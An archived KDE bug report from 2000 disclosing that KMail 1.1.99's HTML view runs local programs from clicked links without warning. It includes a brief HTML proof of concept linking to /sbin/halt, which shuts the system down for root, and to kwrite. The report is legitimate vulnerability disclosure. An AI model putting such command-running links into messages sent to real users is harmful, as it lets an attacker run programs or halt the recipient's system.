[prev in list] [next in list] [prev in thread] [next in thread] 

List:       kde-bugs-dist
Subject:    Bug#14253: kmail html security bug
From:       TiloUlbrich () web ! de
Date:       2000-10-31 19:34:45
[Download RAW message or body]

Package: unknown
Version: KDE 2.0
Severity: normal
Installed from: SUSE 7.0 RPMs

Hi 
I found a security bug KMail V 1.1.99 (KDE2.0). 

Was the HTML-View for messages activated, a HTML-link can show to a local program, \
and KMail exec it, if i click the link. KMail exec it WITHOUT a warning (see Konqi; \
he shows a little yes/no question). 

So it is possible to exec programms which needn't arguments. E.g "/sbin/halt" if I \
work with "root" were big shit.

It was a good thing to disable the HTML-View for default. 
html code:

<html>
<body>
** SHUTDOWN ** (only root)<br>
<a href="/sbin/halt">
run "/sbin/halt"
</a>

<p></p>
<hr>

** KWRITE ** (all users)<br>
<a href="/opt/kde2/bin/kwrite">
run "/opt/kde2/bin/kwrite"
</a>

</body>
</html>

(submitted via bugs.kde.org)


[prev in list] [next in list] [prev in thread] [next in thread]